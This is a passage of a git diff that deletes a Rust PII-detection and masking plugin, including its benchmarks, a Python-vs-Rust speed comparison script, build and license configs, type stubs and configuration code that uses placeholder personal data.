|b, _| b.iter(|| mask_pii(black_box(text), black_box(&detections), black_box(&config))), - ); - } - - group.finish(); -} - -fn bench_empty_vs_pii_text(c: &mut Criterion) { - let mut group = c.benchmark_group("empty_vs_pii"); - - let config = create_test_config(); - let patterns = compile_patterns(&config).unwrap(); - - let empty_text = ""; - let no_pii_text = "This is just normal text without any PII"; - let with_pii_text = "SSN: 123-45-6789"; - - group.bench_function("empty_text", |b| { - b.iter(|| { - detect_pii( - black_box(empty_text), - black_box(&patterns), - black_box(&config), - ) - }) - }); - - group.bench_function("no_pii_text", |b| { - b.iter(|| { - detect_pii( - black_box(no_pii_text), - black_box(&patterns), - black_box(&config), - ) - }) - }); - - group.bench_function("with_pii_text", |b| { - b.iter(|| { - detect_pii( - black_box(with_pii_text), - black_box(&patterns), - black_box(&config), - ) - }) - }); - - group.finish(); -} - -fn bench_realistic_workload(c: &mut Criterion) { - let config = create_test_config(); - let patterns = compile_patterns(&config).unwrap(); - - // Simulate realistic API request payload - let realistic_text = r#"{ - "user": { - "ssn": "123-45-6789", - "email": "john.doe@example.com", - "phone": "(555) 123-4567", - "address": "123 Main St, Anytown, USA", - "credit_card": "4111-1111-1111-1111", - "notes": "Customer called regarding account issue" - }, - "metadata": { - "ip_address": "192.168.1.100", - "timestamp": "2025-01-15T10:30:00Z", - "request_id": "abc123" - } - }"#; - - c.bench_function("realistic_api_payload", |b| { - b.iter(|| { - let detections = detect_pii( - black_box(realistic_text), - black_box(&patterns), - black_box(&config), - ); - mask_pii( - black_box(realistic_text), - black_box(&detections), - black_box(&config), - ) - }) - }); -} - -criterion_group!( - benches, - bench_pattern_compilation, - bench_single_ssn_detection, - bench_single_email_detection, - bench_multiple_pii_types, - bench_no_pii_detection, - bench_masking_ssn, - bench_masking_multiple, - bench_large_text_detection, - bench_parallel_regex_matching, - bench_nested_structure_traversal, - bench_whitelist_checking, - bench_different_masking_strategies, - bench_empty_vs_pii_text, - bench_realistic_workload, -); - -criterion_main!(benches); diff --git a/plugins_rust/pii_filter/benchmarks/compare_pii_filter.py b/plugins_rust/pii_filter/benchmarks/compare_pii_filter.py deleted file mode 100755 index 21cc31765b..0000000000 --- a/plugins_rust/pii_filter/benchmarks/compare_pii_filter.py +++ /dev/null @@ -1,442 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding: utf-8 -*- -"""Location: ./benchmarks/compare_pii_filter.py -Copyright 2025 -SPDX-License-Identifier: Apache-2.0 -Authors: Mihai Criveti - -Performance comparison tool: Python vs Rust PII Filter implementations - -Usage: - python benchmarks/compare_pii_filter.py - python benchmarks/compare_pii_filter.py --sizes 100 500 1000 - python benchmarks/compare_pii_filter.py --output results.json -""" - -import argparse -import json -import os -import statistics -import sys -import time -from dataclasses import asdict, dataclass -from typing import List - -# Add project root to path (go up 3 levels: benchmarks -> pii_filter -> plugins_rust -> project_root) -project_root = os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))) -sys.path.insert(0, project_root) - -from plugins.pii_filter.pii_filter import PIIDetector as PythonPIIDetector # noqa: E402 -from plugins.pii_filter.pii_filter import PIIFilterConfig # noqa: E402 - -try: - from plugins.pii_filter.pii_filter import RustPIIDetector, RUST_AVAILABLE -except ImportError: - RUST_AVAILABLE = False - RustPIIDetector = None - - -@dataclass -class BenchmarkResult: - """Results from a single benchmark run.""" - - name: str - implementation: str - duration_ms: float - throughput_mb_s: float - operations: int - text_size_bytes: int - # Latency statistics - min_ms: float = 0.0 - max_ms: float = 0.0 - median_ms: float = 0.0 - p95_ms: float = 0.0 - p99_ms: float = 0.0 - stddev_ms: float = 0.0 - # Additional metrics - ops_per_sec: float = 0.0 - - -class BenchmarkSuite: - """Comprehensive benchmark suite comparing Python and Rust implementations.""" - - def __init__(self): - """Initialize benchmark suite with Python and Rust detectors.""" - self.config = PIIFilterConfig() - self.python_detector = PythonPIIDetector(self.config) - self.rust_detector = RustPIIDetector(self.config) if RUST_AVAILABLE else None - self.results: List[BenchmarkResult] = [] - - def measure_time(self, func, *args, iterations=100): - """Measure execution time of a function over multiple iterations. - - Returns: - Tuple of (average_duration, latencies_list) - """ - # Warmup - for _ in range(10): - func(*args) - - # Measure individual iterations - latencies = [] - for _ in range(iterations): - start = time.perf_counter() - func(*args) - latencies.append(time.perf_counter() - start) - - return statistics.mean(latencies), latencies - - def bench_single_detection(self, text: str, name: str, iterations=1000): - """Benchmark single text detection.""" - text_size = len(text.encode("utf-8")) - - # Python benchmark - py_time, py_latencies = self.measure_time(self.python_detector.detect, text, iterations=iterations) - py_latencies_ms = [latency * 1000 for latency in py_latencies] - py_result = BenchmarkResult( - name=f"{name}_python", - implementation="Python", - duration_ms=py_time * 1000, - throughput_mb_s=(text_size / py_time) / (1024 * 1024), - operations=iterations, - text_size_bytes=text_size, - min_ms=min(py_latencies_ms), - max_ms=max(py_latencies_ms), - median_ms=statistics.median(py_latencies_ms), - p95_ms=statistics.quantiles(py_latencies_ms, n=20)[18] if len(py_latencies_ms) > 20 else max(py_latencies_ms), - p99_ms=statistics.quantiles(py_latencies_ms, n=100)[98] if len(py_latencies_ms) > 100 else max(py_latencies_ms), - stddev_ms=statistics.stdev(py_latencies_ms) if len(py_latencies_ms) > 1 else 0.0, - ops_per_sec=1.0 / py_time, - ) - self.results.append(py_result) - - # Rust benchmark - if self.rust_detector: - rust_time, rust_latencies = self.measure_time(self.rust_detector.detect, text, iterations=iterations) - rust_latencies_ms = [latency * 1000 for latency in rust_latencies] - rust_result = BenchmarkResult( - name=f"{name}_rust", - implementation="Rust", - duration_ms=rust_time * 1000, - throughput_mb_s=(text_size / rust_time) / (1024 * 1024), - operations=iterations, - text_size_bytes=text_size, - min_ms=min(rust_latencies_ms), - max_ms=max(rust_latencies_ms), - median_ms=statistics.median(rust_latencies_ms), - p95_ms=statistics.quantiles(rust_latencies_ms, n=20)[18] if len(rust_latencies_ms) > 20 else max(rust_latencies_ms), - p99_ms=statistics.quantiles(rust_latencies_ms, n=100)[98] if len(rust_latencies_ms) > 100 else max(rust_latencies_ms), - stddev_ms=statistics.stdev(rust_latencies_ms) if len(rust_latencies_ms) > 1 else 0.0, - ops_per_sec=1.0 / rust_time, - ) - self.results.append(rust_result) - - speedup = py_time / rust_time - return py_result, rust_result, speedup - - return py_result, None, 1.0 - - def bench_detection_and_masking(self, text: str, name: str, iterations=500): - """Benchmark combined detection + masking.""" - text_size = len(text.encode("utf-8")) - - # Python benchmark - def python_full(txt): - detections = self.python_detector.detect(txt) - return self.python_detector.mask(txt, detections) - - py_time, py_latencies = self.measure_time(python_full, text, iterations=iterations) - py_latencies_ms = [latency * 1000 for latency in py_latencies] - py_result = BenchmarkResult( - name=f"{name}_full_python", - implementation="Python", - duration_ms=py_time * 1000, - throughput_mb_s=(text_size / py_time) / (1024 * 1024), - operations=iterations, - text_size_bytes=text_size, - min_ms=min(py_latencies_ms), - max_ms=max(py_latencies_ms), - median_ms=statistics.median(py_latencies_ms), - p95_ms=statistics.quantiles(py_latencies_ms, n=20)[18] if len(py_latencies_ms) > 20 else max(py_latencies_ms), - p99_ms=statistics.quantiles(py_latencies_ms, n=100)[98] if len(py_latencies_ms) > 100 else max(py_latencies_ms), - stddev_ms=statistics.stdev(py_latencies_ms) if len(py_latencies_ms) > 1 else 0.0, - ops_per_sec=1.0 / py_time, - ) - self.results.append(py_result) - - # Rust benchmark - if self.rust_detector: - - def rust_full(txt): - detections = self.rust_detector.detect(txt) - return self.rust_detector.mask(txt, detections) - - rust_time, rust_latencies = self.measure_time(rust_full, text, iterations=iterations) - rust_latencies_ms = [latency * 1000 for latency in rust_latencies] - rust_result = BenchmarkResult( - name=f"{name}_full_rust", - implementation="Rust", - duration_ms=rust_time * 1000, - throughput_mb_s=(text_size / rust_time) / (1024 * 1024), - operations=iterations, - text_size_bytes=text_size, - min_ms=min(rust_latencies_ms), - max_ms=max(rust_latencies_ms), - median_ms=statistics.median(rust_latencies_ms), - p95_ms=statistics.quantiles(rust_latencies_ms, n=20)[18] if len(rust_latencies_ms) > 20 else max(rust_latencies_ms), - p99_ms=statistics.quantiles(rust_latencies_ms, n=100)[98] if len(rust_latencies_ms) > 100 else max(rust_latencies_ms), - stddev_ms=statistics.stdev(rust_latencies_ms) if len(rust_latencies_ms) > 1 else 0.0, - ops_per_sec=1.0 / rust_time, - ) - self.results.append(rust_result) - - speedup = py_time / rust_time - return py_result, rust_result, speedup - - return py_result, None, 1.0 - - def bench_nested_processing(self, data: dict, name: str, iterations=100): - """Benchmark nested data structure processing.""" - data_str = json.dumps(data) - data_size = len(data_str.encode("utf-8")) - - # Python benchmark - py_time = self.measure_time(self.python_detector.process_nested, data, "", iterations=iterations) - py_result = BenchmarkResult( - name=f"{name}_nested_python", - implementation="Python", - duration_ms=py_time * 1000, - throughput_mb_s=(data_size / py_time) / (1024 * 1024), - operations=iterations, - text_size_bytes=data_size, - ) - self.results.append(py_result) - - # Rust benchmark - if self.rust_detector: - rust_time = self.measure_time(self.rust_detector.process_nested, data, "", iterations=iterations) - rust_result = BenchmarkResult( - name=f"{name}_nested_rust", - implementation="Rust", - duration_ms=rust_time * 1000, - throughput_mb_s=(data_size / rust_time) / (1024 * 1024), - operations=iterations, - text_size_bytes=data_size, - ) - self.results.append(rust_result) - - speedup = py_time / rust_time - return py_result, rust_result, speedup - - return py_result, None, 1.0 - - def run_all_benchmarks(self, sizes: List[int] = None): - """Run comprehensive benchmark suite.""" - if sizes is None: - sizes = [100, 500, 1000, 5000] - - print("=" * 80) - print("PII Filter Performance Comparison: Python vs Rust") - print("=" * 80) - print() - - # Benchmark 1: Single SSN - print("1. Single SSN Detection") - print("-" * 80) - text = "My SSN is 123-45-6789" - py, rust, speedup = self.bench_single_detection(text, "single_ssn") - self.print_comparison(py, rust, speedup) - print() - - # Benchmark 2: Single Email - print("2. Single Email Detection") - print("-" * 80) - text = "Contact me at john.doe@example.com for more information" - py, rust, speedup = self.bench_single_detection(text, "single_email") - self.print_comparison(py, rust, speedup) - print() - - # Benchmark 3: Multiple PII Types - print("3. Multiple PII Types Detection") - print("-" * 80) - text = "SSN: 123-45-6789, Email: john@example.com, Phone: (555) 123-4567, IP: 192.168.1.100" - py, rust, speedup = self.bench_single_detection(text, "multiple_types") - self.print_comparison(py, rust, speedup) - print() - - # Benchmark 4: No PII Text - print("4. No PII Detection (Best Case)") - print("-" * 80) - text = "This is just normal text without any sensitive information whatsoever. " * 5 - py, rust, speedup = self.bench_single_detection(text, "no_pii") - self.print_comparison(py, rust, speedup) - print() - - # Benchmark 5: Detection + Masking - print("5. Detection + Masking (Full Workflow)") - print("-" * 80) - text = "User: SSN 123-45-6789, Email john@example.com, Credit Card 4111-1111-1111-1111" - py, rust, speedup = self.bench_detection_and_masking(text, "full_workflow") - self.print_comparison(py, rust, speedup) - print() - - # Benchmark 6: Nested Structure (Rust only - Python has different API) - print("6. Nested Data Structure Processing (Rust-only)") - print("-" * 80) - if self.rust_detector: - data = { - "users": [ - {"ssn": "123-45-6789", "email": "alice@example.com", "name": "Alice"}, - {"ssn": "987-65-4321", "email": "bob@example.com", "name": "Bob"}, - ], - "contact": {"email": "admin@example.com", "phone": "555-1234"}, - } - data_str = json.dumps(data) - data_size = len(data_str.encode("utf-8")) - - import time - - start = time.time() - for _ in range(100): - self.rust_detector.process_nested(data, "") - duration = (time.time() - start) / 100 - - print(f" Rust: {duration * 1000:.3f} ms ({(data_size / duration) / (1024 * 1024):.2f} MB/s)") - else: - print(" Rust: Not available") - print() - - # Benchmark 7: Large Text (Variable Sizes) - print("7. Large Text Performance (Variable Sizes)") - print("-" * 80) - for size in sizes: - print(f"\n Size: {size} PII instances") - text = self.generate_large_text(size) - py, rust, speedup = self.bench_single_detection(text, f"large_{size}", iterations=max(10, 100 // (size // 100))) - self.print_comparison(py, rust, speedup, indent=" ") - print() - - # Benchmark 8: Realistic API Payload - print("8. Realistic API Payload") - print("-" * 80) - text = """{ - "user": { - "ssn": "123-45-6789", - "email": "john.doe@example.com", - "phone": "(555) 123-4567", - "address": "123 Main St, Anytown, USA", - "credit_card": "4111-1111-1111-1111" - }, - "metadata": { - "ip_address": "192.168.1.100", - "timestamp": "2025-01-15T10:30:00Z" - } - }""" - py, rust, speedup = self.bench_detection_and_masking(text, "realistic_payload", iterations=500) - self.print_comparison(py, rust, speedup) - print() - - # Summary - self.print_summary() - - def generate_large_text(self, num_instances: int) -> str: - """Generate large text with N PII instances.""" - lines = [] - for i in range(num_instances): - lines.append(f"User {i}: SSN {i % 1000:03d}-45-6789, Email user{i}@example.com, Phone: (555) {i % 1000:03d}-{i % 10000:04d}") - return "\n".join(lines) - - def print_comparison(self, py_result: BenchmarkResult, rust_result: BenchmarkResult = None, speedup: float = 1.0, indent: str = ""): - """Print comparison between Python and Rust results.""" - print(f"{indent}Python:") - print(f"{indent} Avg: {py_result.duration_ms:.3f} ms | Median: {py_result.median_ms:.3f} ms") - print(f"{indent} p95: {py_result.p95_ms:.3f} ms | p99: {py_result.p99_ms:.3f} ms") - print(f"{indent} Min: {py_result.min_ms:.3f} ms | Max: {py_result.max_ms:.3f} ms") - print(f"{indent} StdDev: {py_result.stddev_ms:.3f} ms") - print(f"{indent} Throughput: {py_result.throughput_mb_s:.2f} MB/s | {py_result.ops_per_sec:,.0f} ops/sec") - - if rust_result: - print(f"{indent}Rust:") - print(f"{indent} Avg: {rust_result.duration_ms:.3f} ms | Median: {rust_result.median_ms:.3f} ms") - print(f"{indent} p95: {rust_result.p95_ms:.3f} ms | p99: {rust_result.p99_ms:.3f} ms") - print(f"{indent} Min: {rust_result.min_ms:.3f} ms | Max: {rust_result.max_ms:.3f} ms") - print(f"{indent} StdDev: {rust_result.stddev_ms:.3f} ms") - print(f"{indent} Throughput: {rust_result.throughput_mb_s:.2f} MB/s | {rust_result.ops_per_sec:,.0f} ops/sec") - print(f"{indent}Speedup: {speedup:.1f}x faster (latency improvement: {py_result.median_ms / rust_result.median_ms:.1f}x)") - else: - print(f"{indent}Rust: Not available") - - def print_summary(self): - """Print summary statistics.""" - print("=" * 80) - print("Summary") - print("=" * 80) - print() - - if not self.rust_detector: - print("⚠ Rust implementation not available") - print(" Install with: pip install mcpgateway[rust]") - return - - # Calculate average speedup - python_results = [r for r in self.results if r.implementation == "Python"] - rust_results = [r for r in self.results if r.implementation == "Rust"] - - if len(python_results) == len(rust_results): - total_speedup = 0 - count = 0 - for py_r, rust_r in zip(python_results, rust_results): - if py_r.name.replace("_python", "") == rust_r.name.replace("_rust", ""): - speedup = py_r.duration_ms / rust_r.duration_ms - total_speedup += speedup - count += 1 - - if count > 0: - avg_speedup = total_speedup / count - print(f"Average Speedup: {avg_speedup:.1f}x") - print() - print(f"Rust implementation is {avg_speedup:.1f}x faster on average") - print() - - # Performance category - if avg_speedup >= 10: - print("🚀 EXCELLENT: >10x speedup - Highly recommended") - elif avg_speedup >= 5: - print("✓ GREAT: 5-10x speedup - Recommended for production") - elif avg_speedup >= 3: - print("✓ GOOD: 3-5x speedup - Noticeable improvement") - elif avg_speedup >= 2: - print("✓ MODERATE: 2-3x speedup - Worthwhile upgrade") - else: - print("⚠ MINIMAL: <2x speedup - May not justify complexity") - - def save_results(self, output_path: str): - """Save benchmark results to JSON file.""" - results_dict = [asdict(r) for r in self.results] - with open(output_path, "w") as f: - json.dump(results_dict, f, indent=2) - print(f"\n✓ Results saved to: {output_path}") - - -def main(): - """Main entry point.""" - parser = argparse.ArgumentParser(description="Compare Python vs Rust PII filter performance") - parser.add_argument("--sizes", type=int, nargs="+", default=[100, 500, 1000, 5000], help="Sizes for large text benchmark") - parser.add_argument("--output", type=str, help="Save results to JSON file") - parser.add_argument("--detailed", action="store_true", help="Show detailed latency statistics") - args = parser.parse_args() - - if not RUST_AVAILABLE: - print("⚠ WARNING: Rust implementation not available") - print("Install with: pip install mcpgateway[rust]") - print("Running Python-only benchmarks...\n") - - suite = BenchmarkSuite() - suite.run_all_benchmarks(sizes=args.sizes) - - if args.output: - suite.save_results(args.output) - - -if __name__ == "__main__": - main() diff --git a/plugins_rust/pii_filter/deny.toml b/plugins_rust/pii_filter/deny.toml deleted file mode 100644 index 142f5157ff..0000000000 --- a/plugins_rust/pii_filter/deny.toml +++ /dev/null @@ -1,27 +0,0 @@ -# Cargo-deny config: license and policy checks for this crate. -# See https://embarkstudios.github.io/cargo-deny/ - -[licenses] -unused-allowed-license = "allow" -confidence-threshold = 0.95 -allow = [ - # Currently used across our Rust projects - "Apache-2.0", - "BSD-2-Clause", - "BSD-3-Clause", - "BSL-1.0", - "CC0-1.0", - "ISC", - "LGPL-2.1-or-later", - "MIT", - "MIT-0", - "OpenSSL", - "Unicode-3.0", - "Unicode-DFS-2016", - "Unlicense", - "Zlib", - # Common safe licenses in the Rust ecosystem - "0BSD", - "Apache-2.0 WITH LLVM-exception", - "Unicode-DFS-2015", -] diff --git a/plugins_rust/pii_filter/pyproject.toml b/plugins_rust/pii_filter/pyproject.toml deleted file mode 100644 index 6d8ef14d1c..0000000000 --- a/plugins_rust/pii_filter/pyproject.toml +++ /dev/null @@ -1,22 +0,0 @@ -[build-system] -requires = ["maturin>=1.4,<2.0"] -build-backend = "maturin" - -[project] -name = "mcpgateway-pii-filter" -version = "1.0.0-RC-2" -description = "High-performance PII detection and masking library for MCP Gateway" -authors = [{ name = "ContextForge Contributors" }] -license = { text = "Apache-2.0" } -requires-python = ">=3.11" -classifiers = [ - "Programming Language :: Rust", - "Programming Language :: Python :: Implementation :: CPython", - "Programming Language :: Python :: 3.11", - "Programming Language :: Python :: 3.12", -] - -[tool.maturin] -module-name = "pii_filter_rust" -python-source = "python" -features = ["pyo3/extension-module"] diff --git a/plugins_rust/pii_filter/python/pii_filter_rust/__init__.pyi b/plugins_rust/pii_filter/python/pii_filter_rust/__init__.pyi deleted file mode 100644 index d8e04cf64a..0000000000 --- a/plugins_rust/pii_filter/python/pii_filter_rust/__init__.pyi +++ /dev/null @@ -1,99 +0,0 @@ -# This file is automatically generated by pyo3_stub_gen -# ruff: noqa: E501, F401, F403, F405 - -import builtins -import typing - -__all__ = [ - "PIIDetectorRust", -] - -@typing.final -class PIIDetectorRust: - r""" - Main PII detector exposed to Python - - # Example (Python) - ```python - from pii_filter import PIIDetectorRust - - config = {"detect_ssn": True, "detect_email": True} - detector = PIIDetectorRust(config) - - text = "My SSN is 123-45-6789 and email is john@example.com" - detections = detector.detect(text) - print(detections) # {"ssn": [...], "email": [...]} - - masked = detector.mask(text, detections) - print(masked) # "My SSN is [REDACTED] and email is [REDACTED]" - ``` - """ - - def __new__(cls, config: typing.Any) -> PIIDetectorRust: - r""" - Create a new PII detector - - # Arguments - * `config` - Python dictionary or Pydantic model with configuration - - # Configuration Keys - * `detect_ssn` (bool): Detect Social Security Numbers - * `detect_credit_card` (bool): Detect credit card numbers - * `detect_email` (bool): Detect email addresses - * `detect_phone` (bool): Detect phone numbers - * `detect_ip_address` (bool): Detect IP addresses - * `detect_date_of_birth` (bool): Detect dates of birth - * `detect_passport` (bool): Detect passport numbers - * `detect_driver_license` (bool): Detect driver's license numbers - * `detect_bank_account` (bool): Detect bank account numbers - * `detect_medical_record` (bool): Detect medical record numbers - * `default_mask_strategy` (str): "redact", "partial", "hash", "tokenize", "remove" - * `redaction_text` (str): Text to use for redaction (default: "\[REDACTED\]") - * `block_on_detection` (bool): Whether to block on detection - * `whitelist_patterns` (list[str]): Regex patterns to exclude from detection - """ - - def detect(self, text: builtins.str) -> typing.Any: - r""" - Detect PII in text - - # Arguments - * `text` - Text to scan for PII - - # Returns - Dictionary mapping PII type to list of detections: - ```python - { - "ssn": [ - {"value": "123-45-6789", "start": 10, "end": 21, "mask_strategy": "redact"} - ], - "email": [ - {"value": "john@example.com", "start": 35, "end": 51, "mask_strategy": "redact"} - ] - } - ``` - """ - - def mask(self, text: builtins.str, detections: typing.Any) -> builtins.str: - r""" - Mask detected PII in text - - # Arguments - * `text` - Original text - * `detections` - Detection results from detect() - - # Returns - Masked text with PII replaced - """ - - def process_nested(self, data: typing.Any, path: builtins.str) -> tuple[builtins.bool, typing.Any, typing.Any]: - r""" - Process nested data structures (dicts, lists, strings) - - # Arguments - * `data` - Python object (dict, list, str, or other) - * `path` - Current path in the structure (for logging) - - # Returns - Tuple of (modified: bool, new_data: Any, detections: dict) - """ diff --git a/plugins_rust/pii_filter/src/bin/stub_gen.rs b/plugins_rust/pii_filter/src/bin/stub_gen.rs deleted file mode 100644 index d444b45d95..0000000000 --- a/plugins_rust/pii_filter/src/bin/stub_gen.rs +++ /dev/null @@ -1,19 +0,0 @@ -// Copyright 2026 -// SPDX-License-Identifier: Apache-2.0 -// -// Stub file generator for pii_filter module -// -// This binary generates Python type stub files (.pyi) for the pii_filter module. -// Run with: cargo run --bin stub_gen - -use pii_filter_rust::stub_info; - -fn main() { - // Get stub info (returns Result) - let stub_info = stub_info().expect("Failed to get stub info"); - - // Generate stub files - paths are determined from pyproject.toml - stub_info.generate().expect("Failed to generate stub file"); - - println!("✓ Generated stub files successfully"); -} diff --git a/plugins_rust/pii_filter/src/config.rs b/plugins_rust/pii_filter/src/config.rs deleted file mode 100644 index 82de40237f..0000000000 --- a/plugins_rust/pii_filter/src/config.rs +++ /dev/null @@ -1,381 +0,0 @@ -// Copyright 2025 -// SPDX-License-Identifier: Apache-2.0 -// -// Configuration types for PII Filter - -use pyo3::prelude::*; -use pyo3::types::{PyAny, PyDict}; -use serde::{Deserialize, Serialize}; - -const MAX_TEXT_BYTES_LIMIT: usize = 100 * 1024 * 1024; -const MAX_NESTED_DEPTH_LIMIT: usize = 1000; -const MAX_COLLECTION_ITEMS_LIMIT: usize = 1_000_000; -const DEFAULT_MAX_TEXT_BYTES: usize = 10 * 1024 * 1024; -const DEFAULT_MAX_NESTED_DEPTH: usize = 32; -const DEFAULT_MAX_COLLECTION_ITEMS: usize = 4096; - -/// PII types that can be detected -#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)] -#[serde(rename_all = "snake_case")] -pub enum PIIType { - Ssn, - Bsn, - CreditCard, - Email, - Phone, - IpAddress, - DateOfBirth, - Passport, - DriverLicense, - BankAccount, - MedicalRecord, - Custom, -} - -impl PIIType { - /// Convert PIIType to string for Python - pub fn as_str(&self) -> &'static str { - match self { - PIIType::Ssn => "ssn", - PIIType::Bsn => "bsn", - PIIType::CreditCard => "credit_card", - PIIType::Email => "email", - PIIType::Phone => "phone", - PIIType::IpAddress => "ip_address", - PIIType::DateOfBirth => "date_of_birth", - PIIType::Passport => "passport", - PIIType::DriverLicense => "driver_license", - PIIType::BankAccount => "bank_account", - PIIType::MedicalRecord => "medical_record", - PIIType::Custom => "custom", - } - } -} - -/// Masking strategies for detected PII -#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize, Default)] -#[serde(rename_all = "snake_case")] -pub enum MaskingStrategy { - #[default] - Redact, // Replace with [REDACTED] - Partial, // Show first/last chars (e.g., ***-**-1234) - Hash, // Replace with hash (e.g., [HASH:abc123]) - Tokenize, // Replace with token (e.g., [TOKEN:xyz789]) - Remove, // Remove entirely -} - -/// Custom pattern definition from Python -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct CustomPattern { - pub pattern: String, - pub description: String, - pub mask_strategy: MaskingStrategy, - #[serde(default = "default_enabled")] - pub enabled: bool, -} - -fn default_enabled() -> bool { - true -} - -/// Configuration for PII Filter -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct PIIConfig { - // Detection flags - pub detect_ssn: bool, - pub detect_bsn: bool, - pub detect_credit_card: bool, - pub detect_email: bool, - pub detect_phone: bool, - pub detect_ip_address: bool, - pub detect_date_of_birth: bool, - pub detect_passport: bool, - pub detect_driver_license: bool, - pub detect_bank_account: bool, - pub detect_medical_record: bool, - - // Masking configuration - pub default_mask_strategy: MaskingStrategy, - pub redaction_text: String, - - // Behavior configuration - pub block_on_detection: bool, - pub log_detections: bool, - pub include_detection_details: bool, - - // Resource limits - pub max_text_bytes: usize, - pub max_nested_depth: usize, - pub max_collection_items: usize, - - // Custom patterns - #[serde(default)] - pub custom_patterns: Vec, - - // Whitelist patterns (regex strings) - pub whitelist_patterns: Vec, -} - -impl Default for PIIConfig { - fn default() -> Self { - Self { - // Enable all detections by default - detect_ssn: true, - detect_bsn: true, - detect_credit_card: true, - detect_email: true, - detect_phone: true, - detect_ip_address: true, - detect_date_of_birth: true, - detect_passport: true, - detect_driver_license: true, - detect_bank_account: true, - detect_medical_record: true, - - // Default masking - default_mask_strategy: MaskingStrategy::Redact, - redaction_text: "[REDACTED]".to_string(), - - // Default behavior - block_on_detection: false, - log_detections: true, - include_detection_details: true, - - // Default resource limits - max_text_bytes: DEFAULT_MAX_TEXT_BYTES, - max_nested_depth: DEFAULT_MAX_NESTED_DEPTH, - max_collection_items: DEFAULT_MAX_COLLECTION_ITEMS, - - // Custom patterns - custom_patterns: Vec::new(), - - whitelist_patterns: Vec::new(), - } - } -} - -impl PIIConfig { - /// Extract configuration from Python object (dict or Pydantic model) - pub fn from_py_object(obj: &Bound<'_, PyAny>) -> PyResult { - // Try to convert to dict first (handles both dict and Pydantic models) - let dict = if obj.is_instance_of::() { - obj.cast::()?.clone() - } else { - // For Pydantic models, call model_dump() to get a dict - let model_dump = obj.getattr("model_dump")?; - let dict_obj = model_dump.call0()?; - dict_obj.cast::()?.clone() - }; - - Self::from_py_dict(&dict) - } - - /// Extract configuration from Python dict - pub fn from_py_dict(dict: &Bound<'_, PyDict>) -> PyResult { - let mut config = Self::default(); - - // Helper macro to extract boolean values - macro_rules! extract_bool { - ($field:ident) => { - if let Some(value) = dict.get_item(stringify!($field))? { - config.$field = value.extract()?; - } - }; - } - - // Extract all boolean flags - extract_bool!(detect_ssn); - extract_bool!(detect_bsn); - extract_bool!(detect_credit_card); - extract_bool!(detect_email); - extract_bool!(detect_phone); - extract_bool!(detect_ip_address); - extract_bool!(detect_date_of_birth); - extract_bool!(detect_passport); - extract_bool!(detect_driver_license); - extract_bool!(detect_bank_account); - extract_bool!(detect_medical_record); - extract_bool!(block_on_detection); - extract_bool!(log_detections); - extract_bool!(include_detection_details); - - if let Some(value) = dict.get_item("max_text_bytes")? { - config.max_text_bytes = value.extract()?; - } - if let Some(value) = dict.get_item("max_nested_depth")? { - config.max_nested_depth = value.extract()?; - } - if let Some(value) = dict.get_item("max_collection_items")? { - config.max_collection_items = value.extract()?; - } - - if config.max_text_bytes == 0 { - return Err(pyo3::exceptions::PyValueError::new_err( - "max_text_bytes must be greater than 0", - )); - } - if config.max_text_bytes > MAX_TEXT_BYTES_LIMIT { - return Err(pyo3::exceptions::PyValueError::new_err(format!( - "max_text_bytes must be less than or equal to {}", - MAX_TEXT_BYTES_LIMIT - ))); - } - if config.max_nested_depth == 0 { - return Err(pyo3::exceptions::PyValueError::new_err( - "max_nested_depth must be greater than 0", - )); - } - if config.max_nested_depth > MAX_NESTED_DEPTH_LIMIT { - return Err(pyo3::exceptions::PyValueError::new_err(format!( - "max_nested_depth must be less than or equal to {}", - MAX_NESTED_DEPTH_LIMIT - ))); - } - if config.max_collection_items == 0 { - return Err(pyo3::exceptions::PyValueError::new_err( - "max_collection_items must be greater than 0", - )); - } - if config.max_collection_items > MAX_COLLECTION_ITEMS_LIMIT { - return Err(pyo3::exceptions::PyValueError::new_err(format!( - "max_collection_items must be less than or equal to {}", - MAX_COLLECTION_ITEMS_LIMIT - ))); - } - - // Extract string values - if let Some(value) = dict.get_item("redaction_text")? { - config.redaction_text = value.extract()?; - } - - // Extract mask strategy - if let Some(value) = dict.get_item("default_mask_strategy")? { - let strategy_str: String = value.extract()?; - config.default_mask_strategy = match strategy_str.as_str() { - "redact" => MaskingStrategy::Redact, - "partial" => MaskingStrategy::Partial, - "hash" => MaskingStrategy::Hash, - "tokenize" => MaskingStrategy::Tokenize, - "remove" => MaskingStrategy::Remove, - _ => MaskingStrategy::Redact, - }; - } - - // Extract custom patterns - if let Some(value) = dict.get_item("custom_patterns")? - && let Ok(py_list) = value.cast::() - { - for item in py_list.iter() { - if let Ok(py_dict) = item.cast::() { - let pattern: String = py_dict - .get_item("pattern")? - .ok_or_else(|| { - pyo3::exceptions::PyValueError::new_err("Missing 'pattern' field") - })? - .extract()?; - let description: String = py_dict - .get_item("description")? - .ok_or_else(|| { - pyo3::exceptions::PyValueError::new_err("Missing 'description' field") - })? - .extract()?; - let mask_strategy_str: String = match py_dict.get_item("mask_strategy")? { - Some(val) => val.extract()?, - None => "redact".to_string(), - }; - let enabled: bool = match py_dict.get_item("enabled")? { - Some(val) => val.extract()?, - None => true, - }; - - let mask_strategy = match mask_strategy_str.as_str() { - "redact" => MaskingStrategy::Redact, - "partial" => MaskingStrategy::Partial, - "hash" => MaskingStrategy::Hash, - "tokenize" => MaskingStrategy::Tokenize, - "remove" => MaskingStrategy::Remove, - _ => MaskingStrategy::Redact, - }; - - config.custom_patterns.push(CustomPattern { - pattern, - description, - mask_strategy, - enabled, - }); - } - } - } - - // Extract whitelist patterns - if let Some(value) = dict.get_item("whitelist_patterns")? { - config.whitelist_patterns = value.extract()?; - } - - Ok(config) - } -} - -#[cfg(test)] -mod tests { - use super::*; - use pyo3::types::PyDict; - - #[test] - fn test_pii_type_as_str() { - assert_eq!(PIIType::Ssn.as_str(), "ssn"); - assert_eq!(PIIType::CreditCard.as_str(), "credit_card"); - assert_eq!(PIIType::Email.as_str(), "email"); - } - - #[test] - fn test_default_config() { - let config = PIIConfig::default(); - assert!(config.detect_ssn); - assert!(config.detect_email); - assert_eq!(config.redaction_text, "[REDACTED]"); - assert_eq!(config.default_mask_strategy, MaskingStrategy::Redact); - assert_eq!(config.max_text_bytes, 